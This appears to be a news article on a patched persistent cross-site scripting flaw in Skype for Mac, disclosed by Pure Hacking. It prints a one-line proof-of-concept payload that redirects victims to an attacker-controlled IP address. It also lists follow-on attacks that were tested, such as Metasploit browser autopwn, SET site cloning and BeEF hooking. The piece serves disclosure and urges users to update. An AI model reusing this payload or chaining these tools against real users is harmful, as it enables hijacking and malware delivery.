|
|
Skype has now released an updated version with the issue addressed. With that version now widely available, Pure Hacking has decided to discuss the issue in detail.
The bug is based around a persistent XSS (cross-site scripting) attack which would allow an attacker to redirect a victim's PC to any website of the attacker's choosing (which will almost certainly contain some kind of anti-social software!).
According to the statement by Gordon Maddern of Pure Hacking, It is caused by Skype failing to sanitize a message before the client renders the message. It is persistant because it is stored in the users chat history and the payload is re-executed everytime the contact is clicked. It requires no user interation and can be triggered just by sending a message. As far as we could tell there was no setting to prevent this. The following proof of concept demonstrates this:
https://www.example.com/?foo=">document.location='https://10.11.1.225';
The success of this attack is up to the attackers imagination. Some of the examples Pure Hacking tested were:
1) Using a browser exploit to execute shellcode
2) Using metasploits browser autopwn
3) Using SET to clone the skype.com website so the victim was redirected to what looked like the Skype website and running a malicious java applet
4) Using Beef to hook in a zombie
5) Using the the javascript attack API
If readers use Skype on a Mac and haven't yet downloaded the latest version, iTWire suggests they do so immediately.
